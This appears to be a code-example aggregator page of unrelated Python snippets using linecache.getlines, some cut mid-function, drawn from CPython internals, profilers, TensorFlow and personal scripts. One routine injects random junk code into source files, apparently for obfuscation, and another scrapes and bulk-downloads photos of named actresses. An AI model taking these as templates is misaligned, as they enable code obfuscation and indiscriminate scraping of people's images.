        and (dihln0 - angln1 == 2) and (impln0 - dihln1 == 2) and (nbbln - impln1 > 2):
        pass
    else:
        raise pymsmtError(
            'Error of reading the .dat file! Please check it whether '
            'it has different parameter types mixed in one section!')

    # Read the NB
    if hasljed is True:
        for i in range(nbbln + 1, ljedbln):
            rline = linecache.getline(datf, i)
            line = rline.strip()
            if line:
                nbparms = readnb(nbparms, line)
        for i in range(ljedbln + 1, nbeln):
            rline = linecache.getline(datf, i)
            line = rline.strip()
            if line:
                ljedparms = readljed(ljedparms, line)
    else:
        for i in range(nbbln + 1, nbeln):
            rline = linecache.getline(datf, i)
            line = rline.strip()
            if line:
                nbparms = readnb(nbparms, line)

    # Deal with the equil atoms
    eqdict = {}
    for i in range(nbbln - 3, nbbln):
        rline = linecache.getline(datf, i)
        line = rline.strip()
        if line and rline[0] != ' ':
            eqdict = readeqnb(eqdict, line)

    for i in list(eqdict.keys()):
        for j in eqdict[i]:
            if len(i) == 1:
                nbparms[j] = nbparms[i + ' ']
            else:
                nbparms[j] = nbparms[i]

    # Merge all the parameters into one dict
    parmdict = Parms(massparms, bondparms, angparms, dihparms, impparms,
                     nbparms, ljedparms)
    linecache.clearcache()

    return parmdict
Beispiel #33
0
def _parse_lambda(lam):
    """Returns the AST and source code of given lambda function.

  Args:
    lam: types.LambdaType, Python function/method/class

  Returns:
    gast.AST, Text: the parsed AST node; the source code that was parsed to
    generate the AST (including any prefixes that this function may have added).
  """
    # TODO(mdan): Use a fast path if the definition is not multi-line.
    # We could detect that the lambda is in a multi-line expression by looking
    # at the surrounding code - an surrounding set of parentheses indicates a
    # potential multi-line definition.

    mod = inspect.getmodule(lam)
    f = inspect.getsourcefile(lam)
    def_line = lam.__code__.co_firstlineno

    # This method is more robust that just calling inspect.getsource(mod), as it
    # works in interactive shells, where getsource would fail. This is the
    # same procedure followed by inspect for non-modules:
    # https://github.com/python/cpython/blob/3.8/Lib/inspect.py#L772
    lines = linecache.getlines(f, mod.__dict__)
    source = ''.join(lines)

    # Narrow down to the last node starting before our definition node.
    all_nodes = parse(source, preamble_len=0, single_node=False)
    search_nodes = []
    for node in all_nodes:
        # Also include nodes without a line number, for safety. This is defensive -
        # we don't know whether such nodes might exist, and if they do, whether
        # they are not safe to skip.
        # TODO(mdan): Replace this check with an assertion or skip such nodes.
        if getattr(node, 'lineno', def_line) <= def_line:
            search_nodes.append(node)
        else:
            # Found a node starting past our lambda - can stop the search.
            break

    # Extract all lambda nodes from the shortlist.
    lambda_nodes = []
    for node in search_nodes:
        lambda_nodes.extend(n for n in gast.walk(node)
                            if isinstance(n, gast.Lambda))

    # Filter down to lambda nodes which span our actual lambda.
    candidates = []
    for ln in lambda_nodes:
        minl, maxl = MAX_SIZE, 0
        for n in gast.walk(ln):
            minl = min(minl, getattr(n, 'lineno', minl))
            lineno = getattr(n, 'lineno', maxl)
            end_lineno = getattr(n, 'end_lineno', None)
            if end_lineno is not None:
                # end_lineno is more precise, but lineno should almost always work too.
                lineno = end_lineno
            maxl = max(maxl, lineno)
        if minl <= def_line <= maxl:
            candidates.append((ln, minl, maxl))

    # Happy path: exactly one node found.
    if len(candidates) == 1:
        (node, minl, maxl), = candidates  # pylint:disable=unbalanced-tuple-unpacking
        return _without_context(node, lines, minl, maxl)

    elif not candidates:
        raise errors.UnsupportedLanguageElementError(
            'could not parse the source code of {}:'
            ' no matching AST found'.format(lam))

    # Attempt to narrow down selection by signature is multiple nodes are found.
    matches = [v for v in candidates if _node_matches_argspec(v[0], lam)]
    if len(matches) == 1:
        (node, minl, maxl), = matches
        return _without_context(node, lines, minl, maxl)

    # Give up if could not narrow down to a single node.
    matches = '\n'.join('Match {}:\n{}\n'.format(
        i, unparse(node, include_encoding_marker=False))
                        for i, (node, _, _) in enumerate(matches))
    raise errors.UnsupportedLanguageElementError(
        'could not parse the source code of {}: found multiple definitions with'
        ' identical signatures at the location. This error'
        ' may be avoided by defining each lambda on a single line and with'
        ' unique argument names.\n{}'.format(lam, matches))
Beispiel #34
0
 def test_lazycache_no_globals(self):
     lines = linecache.getlines(FILENAME)
     linecache.clearcache()
     self.assertEqual(False, linecache.lazycache(FILENAME, None))
     self.assertEqual(lines, linecache.getlines(FILENAME))
Beispiel #35
0
    if len(resurl) > 0:
        with open('赵丽颖.txt', 'a', encoding='utf-8') as file:
            file.write('http://www.mingtuiw.com'+resurl[0])
            file.write('\n')


def getList():
    for i in range(1, 20):
        link = 'http://www.mingtuiw.com/archives/category/演员/迪丽热巴/page/' + str(i)
        try:
            getTitle(link)
        except:
            logging.debug('TitleError' + link)

def downPhoto(link):
    try:
        r = requests.get(link[:-1], headers=headers, timeout=3)
        fw = open('F:\leg\dlrb\ ' + link[51:-13] + '.jpg', 'wb')
        fw.write(r.content)
        r.close()
    except:
        logging.debug(link + 'is wrong')


pool = ThreadPool(4) #双核电脑
tot_page = []
str = linecache.getlines('porn2.txt')
pool.map(downPhoto, str)  # 多线程工作
pool.map(getTitle,tot_page)
pool.close()
pool.join()
def main(argv):  #argv[1]
    print('参数1是函数时间信息的文件名,2是rapl数据', argv[0], argv[1])
    funSumPowerList = []
    funPowerList = []
    treegriddataList = []

    funTimeData = linecache.getlines(argv[0])
    raplData = linecache.getlines(argv[1])
    print(len(raplData))
    #lenfunTimeData=len(funTimeData)
    index = 0
    for i in range(1, (len(funTimeData) + 1)):
        #i, 1~ len-1, 0行是空的
        tmpline = linecache.getline(argv[0], i)

        tmpline = tmpline.strip()
        ft1 = ft2 = 0
        if tmpline.split(' ')[1] == '1':
            #print(i,tmpline)

            ft1 = int(tmpline.split(' ')[0])
            funname = tmpline.split(' ')[2]
            tmp = 0
            chongming = 0
            #寻找函数的结束时间
            #linecache里没第0行,所以这里的行数要注意下,for里是有第0行的
            for j in funTimeData:
                if tmp <= (i - 1):
                    tmp = tmp + 1
                    continue
                if j.split(' ')[1] == '1':  #不是1就是-1啊
                    if j.split(' ')[2].strip() == funname:
                        chongming = chongming + 1
                    tmp = tmp + 1
                elif j.split(' ')[2].strip() == funname:
                    if chongming == 0:
                        ft2 = int(j.split(' ')[0])
                        #print j
                        break
                    else:
                        chongming = chongming - 1
                        continue

            pt11 = pt12 = pt21 = pt22 = 0
            tmptime1 = tmptime2 = 0
            for k in raplData:
                tmptime2 = int(k.split(' ')[0])
                if ft1 >= tmptime1 and ft1 <= tmptime2:
                    pt11 = tmptime1
                    pt12 = tmptime2
                if ft2 >= tmptime1 and ft2 <= tmptime2:
                    pt21 = tmptime1
                    pt22 = tmptime2
                    break
                tmptime1 = int(k.split(' ')[0])

            #print (ft1,ft2,funname,pt11,pt12,pt21,pt22)

            #计算i行函数的能耗
            p0 = p1 = d0 = d1 = 0.0
            if (pt11 == pt21 and pt12 == pt22):
                for m in raplData:
                    tmpt = int(m.split(' ')[0])
                    #1534238755593453 p0=21789550 p1=23132324 d0=4180908 d1=4180908
                    if tmpt == pt22:
                        tmpdata = pdataconvert(m.strip())
                        #print m
                        p0 = tmpdata[0] * 1.0 * (ft2 - ft1) / (pt22 - pt21)
                        p1 = tmpdata[1] * 1.0 * (ft2 - ft1) / (pt22 - pt21)
                        d0 = tmpdata[2] * 1.0 * (ft2 - ft1) / (pt22 - pt21)
                        d1 = tmpdata[3] * 1.0 * (ft2 - ft1) / (pt22 - pt21)
                        break
            else:
                tmptime1 = tmptime2 = 0
                for m in raplData:
                    tmpt = int(m.split(' ')[0])
                    if tmpt == pt12:
                        #print m
                        tmpdata = pdataconvert(m.strip())
                        p0 = tmpdata[0] * 1.0 * (pt12 - ft1) / (pt12 - pt11)
                        p1 = tmpdata[1] * 1.0 * (pt12 - ft1) / (pt12 - pt11)
                        d0 = tmpdata[2] * 1.0 * (pt12 - ft1) / (pt12 - pt11)
                        d1 = tmpdata[3] * 1.0 * (pt12 - ft1) / (pt12 - pt11)
                        continue
                    if tmpt > pt12 and tmpt < pt21:
                        #print m
                        tmpdata = pdataconvert(m.strip())
                        p0 += tmpdata[0] * 1.0
                        p1 += tmpdata[1] * 1.0
                        d0 += tmpdata[2] * 1.0
                        d1 += tmpdata[3] * 1.0
                        continue
                    if tmpt == pt22:
                        #print m
                        tmpdata = pdataconvert(m.strip())
                        p0 += tmpdata[0] * 1.0 * (ft2 - pt21) / (pt22 - pt21)
                        p1 += tmpdata[1] * 1.0 * (ft2 - pt21) / (pt22 - pt21)
                        d0 += tmpdata[2] * 1.0 * (ft2 - pt21) / (pt22 - pt21)
                        d1 += tmpdata[3] * 1.0 * (ft2 - pt21) / (pt22 - pt21)
                        break
            #函数的能耗 或者在这里追加到一个文件,次数也是很多的
            #funPowerList.append([funname,p0,p1,d0,d1])
            #print funname,p0,p1,d0,d1
            funPowerList.append([
                str(ft1),
                str(ft2), funname,
                str(p0),
                str(p1),
                str(d0),
                str(d1)
            ])
            #funPowerList.append([str(ft1),str(ft2),funname,str(p0),str(p1),str(d0),str(d1)])
            #treegriddataList
            #treegriddataList.append()
            #print funPowerList
    #将结果保存到文件
    print("将结果保存到文件,文件名为 参数3.funpower.时间 \n")
    currenttime = time.localtime(time.time())
    fw = open(
        argv[2] + ".funpower" + str(currenttime.tm_mon) +
        str(currenttime.tm_mday) + str(currenttime.tm_hour) +
        str(currenttime.tm_min), 'w')
    #fw.writelines(['#!/usr/bin/env sh\n'])
    for i in funPowerList:
        #[funname,p0,p1,d0,d1]
        #fw.writelines([i,'\n'])
        fw.writelines([
            i[0], ',', i[1], ',', i[2], ',', i[3], ',', i[4], ',', i[5], ',',
            i[6]
        ])
        fw.writelines(['\n'])
    fw.close()

    print('生成treegrid data...')
    '''
	name_age={"da_wang":27,"liu":26,"kong":12}用dict表示刚好,但注意dict中是单引号
	
	{"id":11,"name":"fun1","power":"111,1111,2222,333","_parentId":0},
	{"id":0,"name":"functions"},
	{"id":11,"region":"Albin","f1":2000,"f2":1800,"f3":1903,"f4":2183,"f5":2133,"f6":1923,"f7":2018,"f8":1838,"_parentId":1},
	{"id":2,"region":"Washington"},
	{"id":21,"region":"Bellingham","f1":2000,"f2":1800,"f3":1903,"f4":2183,"f5":2133,"f6":1923,"f7":2018,"f8":1838,"_parentId":2},
	{"id":24,"region":"Monroe","f1":2000,"f2":1800,"f3":1903,"f4":2183,"f5":2133,"f6":1923,"f7":2018,"f8":1838,"_parentId":2}
	],"footer":[
	{"region":"Total","f1":14000,"f2":12600,"f3":13321,"f4":15281,"f5":14931,"f6":13461,"f7":14126,"f8":12866}
]}
	'''
    filename = argv[2] + ".treegrid" + str(currenttime.tm_mon) + str(
        currenttime.tm_mday) + str(currenttime.tm_hour) + str(
            currenttime.tm_min)
    fw = open(filename, 'w')
    print('save to ' + filename)
    fw.writelines(['''{"total":''' + str(len(funPowerList)) + ''',"rows":['''])
    fw.writelines(['\n'])

    tsum = p0sum = p1sum = d0sum = d1sum = 0.0  #计算总和
    funPowerList2 = funPowerList
    #print( 'fnname\ttime(us)\tp0\tp1\td0\td1'  )
    #print( '%20s %12s %12s %12s %12s %12s'  )%('fnname','time(us)','p0','p1','d0','d1') #python2
    print('%20s %12s %12s %12s %12s %12s' %
          ('fnname', 'time(us)', 'p0', 'p1', 'd0', 'd1'))  #python3
    for i, v in enumerate(funPowerList):
        parentID = 0
        #print i,v #i从0开始
        #[time1,time2,funname,p0,p1,d0,d1]
        ftime1 = int(v[0])
        ftime2 = int(v[1])
        #for i2,v2 in enumerate(funPowerList[(i+1):]): # i2也是从0开始,这样就不知道行数了
        for i2, v2 in enumerate(funPowerList):
            ftime3 = int(v2[0])
            ftime4 = int(v2[1])
            if ftime3 < ftime1 and ftime2 < ftime4:
                parentID = i2 + 1
                continue
            if ftime2 < ftime3:
                break
        if parentID != 0:
            #string='''{'id':'''+ str(i+1)+ ''','name':'''+v[2]+''','p0':'''+i[3]+''','p1':'''+i[4]+''','d0':'''+i[5]+''','d1':'''+i[6]+''','_parentId':'''+str(parentID)+'}'
            #fw.writelines([str({'id':i+1,'name':v[2],'p0':i[3],'p1':i[4],'d0':i[5],'d1':i[6],'_parentId':parentID})])
            #tmpdict={'id':(i+1),'name':v[2],'p0':v[3],'p1':v[4],'d0':v[5],'d1':v[6],'_parentId':parentID}
            tmpdict = {
                'id': (i + 1),
                'name': v[2],
                't': time2kexue(ftime2 - ftime1),
                'p0': '%.3e' % (float(v[3])),
                'p1': '%.3e' % (float(v[4])),
                'd0': '%.3e' % (float(v[5])),
                'd1': '%.3e' % (float(v[6])),
                '_parentId': parentID
            }
        else:
            p0sum += float(v[3])
            p1sum += float(v[4])
            d0sum += float(v[5])
            d1sum += float(v[6])
            tsum += float(ftime2 - ftime1)
            tmpdict = {
                'id': (i + 1),
                'name': v[2],
                't': time2kexue(ftime2 - ftime1),
                'p0': '%.3e' % (float(v[3])),
                'p1': '%.3e' % (float(v[4])),
                'd0': '%.3e' % (float(v[5])),
                'd1': '%.3e' % (float(v[6]))
            }
        #.replace('\'','"')单引号的json格式不识别,应该为双引号
        fw.writelines([str(tmpdict).replace('\'', '"'), '\n'])
        #print( tmpdict['name']+'\t'+tmpdict['t']+'\t'+tmpdict['p0']+'\t'+tmpdict['p1']+'\t'+tmpdict['d0']+'\t'+tmpdict['d1']  )
        #print( '%20s %12s %12s %12s %12s %12s'  )%(tmpdict['name'],tmpdict['t'],tmpdict['p0'],tmpdict['p1'],tmpdict['d0'],tmpdict['d1']) #python2
        print('%20s %12s %12s %12s %12s %12s' %
              (tmpdict['name'], tmpdict['t'], tmpdict['p0'], tmpdict['p1'],
               tmpdict['d0'], tmpdict['d1']))  #python3
        if i + 1 != len(funPowerList):
            fw.writelines([','])
        #treegriddataList.append()

    #],"footer":[{"name":"Total Energy:","persons":7,"iconCls":"icon-sum"} ]}
    #fw.writelines([']}']) #这是不加总和的
    #print('{"name":"Total Energy:","p0":"%.f","p1":"%.f","d0":"%.f","d1":"%.f"} ]}'%(float(p0sum),float(p1sum),float(d0sum),float(d1sum),))
    print(
        '----\n%20s %12s   %.4e   %.4e   %.4e   %.4e' % (
            'sum',
            time2kexue(tsum),
            float(p0sum),
            float(p1sum),
            float(d0sum),
            float(d1sum),
        )
    )  # #python3  print('{"name":"Total Energy:","p0":"%.f","p1":"%.f","d0":"%.f","d1":"%.f"} ]}'%(float(p0sum),float(p1sum),float(d0sum),float(d1sum),))
    fw.writelines([
        '],"footer":[{"name":"Total Energy:","t":"%s","p0":"%.3e","p1":"%.3e","d0":"%.3e","d1":"%.3e"} ]}'
        % (
            time2kexue(tsum),
            float(p0sum),
            float(p1sum),
            float(d0sum),
            float(d1sum),
        )
    ])
    fw.close()
    print('over.')
def pdataconvert(p):
    #print p
    #p0=21789550 p1=23132324 d0=4180908 d1=4180908
    tmp = p.split(' ')
    return [
        int(tmp[1].split('=')[1]),
        int(tmp[2].split('=')[1]),
        int(tmp[3].split('=')[1]),
        int(tmp[4].split('=')[1])
    ]


if __name__ == "__main__":
    print("参数3 保存结果的文件名加个funpower >>log.txt")
    main(sys.argv[1:])  #参数0是文件名,不传入下面的函数
'''
linecache.getlines(filename)
从名为filename的文件中得到全部内容,输出为列表格式,以文件每行为列表中的一个元素,并以linenum-1为元素在列表中的位置存储

linecache.getline(filename,lineno)
从名为filename的文件中得到第lineno行。这个函数从不会抛出一个异常–产生错误时它将返回”(换行符将包含在找到的行里)。
如果文件没有找到,这个函数将会在sys.path搜索。

>>> import time()
>>> print time.time()
1518068251.33
>>> time = time.localtime(time.time())
>>> print time
time.struct_time(tm_year=2018, tm_mon=2, tm_mday=8, tm_hour=13, tm_min=37, tm_sec=31, tm_wday=3, tm_yday=39, tm_isdst=0)
>>> print time.tm_year
2018
Beispiel #38
0
    def write_results(self, show_missing=True, summary=False, coverdir=None):
        """
        @param coverdir
        """
        if self.calledfuncs:
            print()
            print("functions called:")
            calls = self.calledfuncs.keys()
            for filename, modulename, funcname in sorted(calls):
                print(("filename: %s, modulename: %s, funcname: %s" %
                       (filename, modulename, funcname)))

        if self.callers:
            print()
            print("calling relationships:")
            lastfile = lastcfile = ""
            for ((pfile, pmod, pfunc), (cfile, cmod, cfunc)) \
                    in sorted(self.callers.keys()):
                if pfile != lastfile:
                    print()
                    print("***", pfile, "***")
                    lastfile = pfile
                    lastcfile = ""
                if cfile != pfile and lastcfile != cfile:
                    print("  -->", cfile)
                    lastcfile = cfile
                print("    %s.%s -> %s.%s" % (pmod, pfunc, cmod, cfunc))

        # turn the counts data ("(filename, lineno) = count") into something
        # accessible on a per-file basis
        per_file = {}
        for filename, lineno in self.counts.keys():
            lines_hit = per_file[filename] = per_file.get(filename, {})
            lines_hit[lineno] = self.counts[(filename, lineno)]

        # accumulate summary info, if needed
        sums = {}

        for filename, count in per_file.items():
            if self.is_ignored_filename(filename):
                continue

            if filename.endswith((".pyc", ".pyo")):
                filename = filename[:-1]

            if coverdir is None:
                dir = os.path.dirname(os.path.abspath(filename))
                modulename = modname(filename)
            else:
                dir = coverdir
                if not os.path.exists(dir):
                    os.makedirs(dir)
                modulename = fullmodname(filename)

            # If desired, get a list of the line numbers which represent
            # executable content (returned as a dict for better lookup speed)
            if show_missing:
                lnotab = find_executable_linenos(filename)
            else:
                lnotab = {}

            source = linecache.getlines(filename)
            coverpath = os.path.join(dir, modulename + ".cover")
            n_hits, n_lines = self.write_results_file(coverpath, source,
                                                      lnotab, count)

            if summary and n_lines:
                percent = int(100 * n_hits / n_lines)
                sums[modulename] = n_lines, percent, modulename, filename

        if summary and sums:
            print("lines   cov%   module   (path)")
            for m in sorted(sums.keys()):
                n_lines, percent, modulename, filename = sums[m]
                print("%5d   %3d%%   %s   (%s)" % sums[m])

        if self.outfile:
            # try and store counts and module info into self.outfile
            try:
                pickle.dump((self.counts, self.calledfuncs, self.callers),
                            open(self.outfile, 'wb'), 1)
            except IOError as err:
                print("Can't save counts files because %s" % err,
                      file=sys.stderr)
def insert_garbage_code(path):
    def get_random_api_text():
        text = random.choice(api)
        return '{0}//{1}'.format(
            text.replace('\n', ''), ''.join(
                random.sample(text, random.randint(8, 16))).replace('\n',
                                                                    '')) + '\n'

    def roll():
        return random.choice([True, False, False])

    def skip_num(line):
        """
        计算是否遇到不稳定的pattern,如果是 返回1
        :param line:
        :return:
        """
        pattern = ['foreach', 'for', 'if', 'else']
        return len(list(filter(lambda x: x in line, pattern)))

    api = linecache.getlines(config.method_api_out_path)

    insert_points_list = []
    with open('insert.yaml', 'r', encoding='utf-8') as f:
        insert_points_list = yaml.load(f, yaml.SafeLoader)

    for insert_points in insert_points_list:
        file_path = concat_abs_path(path, insert_points['file'])
        insert_points = insert_points['pattern']

        lines = linecache.getlines(file_path)
        out = lines.copy()

        find = False
        method_end_str = ''
        times = 0
        skip = 0
        for index, line in enumerate(lines):

            def validate_line(line):
                return line.find(';') != -1 and line.find('return') == -1

            if find and line == method_end_str:  # 重置函数位置
                find = False
                skip = 0
                continue

            if skip > 0:  # 跳过pattern的下一行
                skip = skip - 1
                continue

            if line.strip().startswith('//'):  # 跳过注释
                continue

            if len(list(filter(lambda x: x in line,
                               insert_points))) > 0:  # 找到函数位置
                find = True
                method_end_str = lines[index + 1].replace('{', '}')  # 函数结束缩进
                times = 0
                continue

            skip = skip_num(line)  # 计算pattern
            if skip > 0:
                continue

            if find and validate_line(line) and roll():  # 找到插入点位置和roll到插入
                for i in range(
                        random.randint(config.insert_min, config.insert_max)):
                    out[index] = out[index] + (line.replace(
                        '    ',
                        '\t').count('\t')) * '\t' + get_random_api_text()
                    times = times + 1
        linecache.clearcache()
        with open(file_path, 'w') as f:
            f.writelines(out)
            logging.info('insert:{0} [{1}] times'.format(file_path, times))
Beispiel #40
0
def warn_explicit(message, category, filename, lineno,
                  module=None, registry=None, module_globals=None):
    lineno = int(lineno)
    if module is None:
        module = filename or "<unknown>"
        if module[-3:].lower() == ".py":
            module = module[:-3] # XXX What about leading pathname?
    if registry is None:
        registry = {}
    if isinstance(message, Warning):
        text = str(message)
        category = message.__class__
    else:
        text = message
        message = category(message)
    key = (text, category, lineno)
    # Quick test for common case
    if registry.get(key):
        return
    # Search the filters
    for item in filters:
        action, msg, cat, mod, ln = item
        if ((msg is None or msg.match(text)) and
            issubclass(category, cat) and
            (mod is None or mod.match(module)) and
            (ln == 0 or lineno == ln)):
            break
    else:
        action = defaultaction
    # Early exit actions
    if action == "ignore":
        registry[key] = 1
        return

    # Prime the linecache for formatting, in case the
    # "file" is actually in a zipfile or something.
    linecache.getlines(filename, module_globals)

    if action == "error":
        raise message
    # Other actions
    if action == "once":
        registry[key] = 1
        oncekey = (text, category)
        if onceregistry.get(oncekey):
            return
        onceregistry[oncekey] = 1
    elif action == "always":
        pass
    elif action == "module":
        registry[key] = 1
        altkey = (text, category, 0)
        if registry.get(altkey):
            return
        registry[altkey] = 1
    elif action == "default":
        registry[key] = 1
    else:
        # Unrecognized actions are errors
        raise RuntimeError(
              "Unrecognized action (%r) in warnings.filters:\n %s" %
              (action, item))
    # Print message and context
    showwarning(message, category, filename, lineno)
    def write_results(self, show_missing=True, summary=False, coverdir=None):
        """
        Write the coverage results.

        :param show_missing: Show lines that had no hits.
        :param summary: Include coverage summary per module.
        :param coverdir: If None, the results of each module are placed in its
                         directory, otherwise it is included in the directory
                         specified.
        """
        if self.calledfuncs:
            print(file=self.output_file)
            print("functions called:", file=self.output_file)
            self.maybe_flush()
            calls = self.calledfuncs
            for filename, modulename, funcname in sorted(calls):
                print(("filename: %s, modulename: %s, funcname: %s" %
                       (filename, modulename, funcname)),
                      file=self.output_file)
                self.maybe_flush()

        if self.callers:
            print(file=self.output_file)
            print("calling relationships:", file=self.output_file)
            self.maybe_flush()
            lastfile = lastcfile = ""
            for ((pfile, pmod, pfunc), (cfile, cmod, cfunc)) \
                    in sorted(self.callers):
                if pfile != lastfile:
                    print(file=self.output_file)
                    print("***", pfile, "***", file=self.output_file)
                    self.maybe_flush()
                    lastfile = pfile
                    lastcfile = ""
                if cfile != pfile and lastcfile != cfile:
                    print("  -->", cfile, file=self.output_file)
                    self.maybe_flush()
                    lastcfile = cfile
                print("    %s.%s -> %s.%s" % (pmod, pfunc, cmod, cfunc),
                      file=self.output_file)
                self.maybe_flush()

        # turn the counts data ("(filename, lineno) = count") into something
        # accessible on a per-file basis
        per_file = {}
        for filename, lineno in self.counts:
            lines_hit = per_file[filename] = per_file.get(filename, {})
            lines_hit[lineno] = self.counts[(filename, lineno)]

        # accumulate summary info, if needed
        sums = {}

        for filename, count in per_file.items():
            if self.is_ignored_filename(filename):
                continue

            if filename.endswith(".pyc"):
                filename = filename[:-1]

            if coverdir is None:
                dir = os.path.dirname(os.path.abspath(filename))
                modulename = _modname(filename)
            else:
                dir = coverdir
                if not os.path.exists(dir):
                    os.makedirs(dir)
                modulename = _fullmodname(filename)

            # If desired, get a list of the line numbers which represent
            # executable content (returned as a dict for better lookup speed)
            if show_missing:
                lnotab = _find_executable_linenos(filename)
            else:
                lnotab = {}
            source = linecache.getlines(filename)
            coverpath = os.path.join(dir, modulename + ".cover")
            with open(filename, 'rb') as fp:
                encoding, _ = tokenize.detect_encoding(fp.readline)
            n_hits, n_lines = self.write_results_file(coverpath, source,
                                                      lnotab, count, encoding)
            if summary and n_lines:
                percent = int(100 * n_hits / n_lines)
                sums[modulename] = n_lines, percent, modulename, filename

        if summary and sums:
            print("lines   cov%   module   (path)", file=self.output_file)
            self.maybe_flush()
            for m in sorted(sums):
                n_lines, percent, modulename, filename = sums[m]
                print("%5d   %3d%%   %s   (%s)" % sums[m],
                      file=self.output_file)
                self.maybe_flush()

        if self.outfile:
            # try and store counts and module info into self.outfile
            try:
                pickle.dump((self.counts, self.calledfuncs, self.callers),
                            open(self.outfile, 'wb'), 1)
            except OSError as err:
                print("Can't save counts files because %s" % err,
                      file=sys.stderr)
Beispiel #42
0
def show_results(prof, stream=None, precision=3):
    if stream is None:
        stream = sys.stdout
    template = '{0:>6} {1:>12} {2:>12}   {3:<}'

    for code in prof.code_map:
        lines = prof.code_map[code]
        if not lines:
            # .. measurements are empty ..
            continue
        filename = code.co_filename
        if filename.endswith((".pyc", ".pyo")):
            filename = filename[:-1]
        stream.write('Filename: ' + filename + '\n\n')
        if not os.path.exists(filename):
            stream.write('ERROR: Could not find file ' + filename + '\n')
            if filename.startswith("ipython-input") or filename.startswith(
                    "<ipython-input"):
                print("NOTE: %mprun can only be used on functions defined in "
                      "physical files, and not in the IPython environment.")
            continue
        all_lines = linecache.getlines(filename)
        sub_lines = inspect.getblock(all_lines[code.co_firstlineno - 1:])
        linenos = range(code.co_firstlineno,
                        code.co_firstlineno + len(sub_lines))
        lines_normalized = {}

        header = template.format('Line #', 'Mem usage', 'Increment',
                                 'Line Contents')
        stream.write(header + '\n')
        stream.write('=' * len(header) + '\n')
        # move everything one frame up
        keys = sorted(lines.keys())

        k_old = keys[0] - 1
        lines_normalized[keys[0] - 1] = lines[keys[0]]
        for i in range(1, len(lines_normalized[keys[0] - 1])):
            lines_normalized[keys[0] - 1][i] = -1.
        k = keys.pop(0)
        while keys:
            lines_normalized[k] = lines[keys[0]]
            for i in range(len(lines_normalized[k_old]),
                           len(lines_normalized[k])):
                lines_normalized[k][i] = -1.
            k_old = k
            k = keys.pop(0)

        first_line = sorted(lines_normalized.keys())[0]
        mem_old = max(lines_normalized[first_line])
        precision = int(precision)
        template_mem = '{{0:{0}.{1}'.format(precision + 6, precision) + 'f} MB'
        for i, l in enumerate(linenos):
            mem = ''
            inc = ''
            if l in lines_normalized:
                mem = max(lines_normalized[l])
                inc = mem - mem_old
                mem_old = mem
                mem = template_mem.format(mem)
                inc = template_mem.format(inc)
            stream.write(template.format(l, mem, inc, sub_lines[i]))
        stream.write('\n\n')
Beispiel #43
0
 def read_records(self, task):
     records = linecache.getlines(
         task.shard.name)[task.shard.start:task.shard.end]
     return records
Beispiel #44
0
def findsource(object):
    """Return the entire source file and starting line number for an object.

    The argument may be a module, class, method, function, traceback, frame,
    or code object.  The source code is returned as a list of all the lines
    in the file and the line number indexes a line in that list.  An IOError
    is raised if the source code cannot be retrieved."""

    file = getfile(object)
    sourcefile = getsourcefile(object)
    if not sourcefile and file[:1] + file[-1:] != '<>':
        raise IOError('source code not available')
    file = sourcefile if sourcefile else file

    module = getmodule(object, file)
    if module:
        lines = linecache.getlines(file, module.__dict__)
    else:
        lines = linecache.getlines(file)
    if not lines:
        raise IOError('could not get source code')

    if ismodule(object):
        return lines, 0

    if isclass(object):
        name = object.__name__
        pat = re.compile(r'^(\s*)class\s*' + name + r'\b')
        # make some effort to find the best matching class definition:
        # use the one with the least indentation, which is the one
        # that's most probably not inside a function definition.
        candidates = []
        for i in range(len(lines)):
            match = pat.match(lines[i])
            if match:
                # if it's at toplevel, it's already the best one
                if lines[i][0] == 'c':
                    return lines, i
                # else add whitespace to candidate list
                candidates.append((match.group(1), i))
        if candidates:
            # this will sort by whitespace, and by line number,
            # less whitespace first
            candidates.sort()
            return lines, candidates[0][1]
        else:
            raise IOError('could not find class definition')

    if ismethod(object):
        object = object.im_func
    if isfunction(object):
        object = object.func_code
    if istraceback(object):
        object = object.tb_frame
    if isframe(object):
        object = object.f_code
    if iscode(object):
        if not hasattr(object, 'co_firstlineno'):
            raise IOError('could not find function definition')
        lnum = object.co_firstlineno - 1
        pat = re.compile(r'^(\s*def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)')
        while lnum > 0:
            if pat.match(lines[lnum]): break
            lnum = lnum - 1
        return lines, lnum
    raise IOError('could not find code object')
    def format_stack_entry(self, frame_lineno, lprefix=': ', context=3):
        import linecache, repr

        ret = []

        Colors = self.color_scheme_table.active_colors
        ColorsNormal = Colors.Normal
        tpl_link = '%s%%s%s' % (Colors.filenameEm, ColorsNormal)
        tpl_call = '%s%%s%s%%s%s' % (Colors.vName, Colors.valEm, ColorsNormal)
        tpl_line = '%%s%s%%s %s%%s' % (Colors.lineno, ColorsNormal)
        tpl_line_em = '%%s%s%%s %s%%s%s' % (Colors.linenoEm, Colors.line,
                                            ColorsNormal)

        frame, lineno = frame_lineno

        return_value = ''
        if '__return__' in frame.f_locals:
            rv = frame.f_locals['__return__']
            #return_value += '->'
            return_value += repr.repr(rv) + '\n'
        ret.append(return_value)

        #s = filename + '(' + `lineno` + ')'
        filename = self.canonic(frame.f_code.co_filename)
        link = tpl_link % filename

        if frame.f_code.co_name:
            func = frame.f_code.co_name
        else:
            func = "<lambda>"

        call = ''
        if func != '?':
            if '__args__' in frame.f_locals:
                args = repr.repr(frame.f_locals['__args__'])
            else:
                args = '()'
            call = tpl_call % (func, args)

        # The level info should be generated in the same format pdb uses, to
        # avoid breaking the pdbtrack functionality of python-mode in *emacs.
        if frame is self.curframe:
            ret.append('> ')
        else:
            ret.append('  ')
        ret.append('%s(%s)%s\n' % (link, lineno, call))

        start = lineno - 1 - context // 2
        lines = linecache.getlines(filename)
        start = max(start, 0)
        start = min(start, len(lines) - context)
        lines = lines[start:start + context]

        for i, line in enumerate(lines):
            show_arrow = (start + 1 + i == lineno)
            linetpl = (frame is self.curframe or show_arrow) \
                      and tpl_line_em \
                      or tpl_line
            ret.append(
                self.__format_line(linetpl,
                                   filename,
                                   start + 1 + i,
                                   line,
                                   arrow=show_arrow))

        return ''.join(ret)
Beispiel #46
0
def main():
    le = preprocessing.LabelEncoder()
    x = np.array([])
    x_len = np.array([])

    line_cache = linecache.getlines(train_file)
    count = len(line_cache)
    number = int(count / chunk_lines)
    print(count)
    print(number)

    t()
    pool = mp.Pool(processes=10)
    jobs = []
    for i in range(10):
        jobs.append(
            pool.apply_async(
                read_distributed,
                line_cache[i * chunk_lines:i * chunk_lines + chunk_lines]))
    # jobs.append(pool.apply_async(read_distributed, line_cache[number * chunk_lines : count]))
    for job in jobs:
        x = np.append(x, job.get()[0])
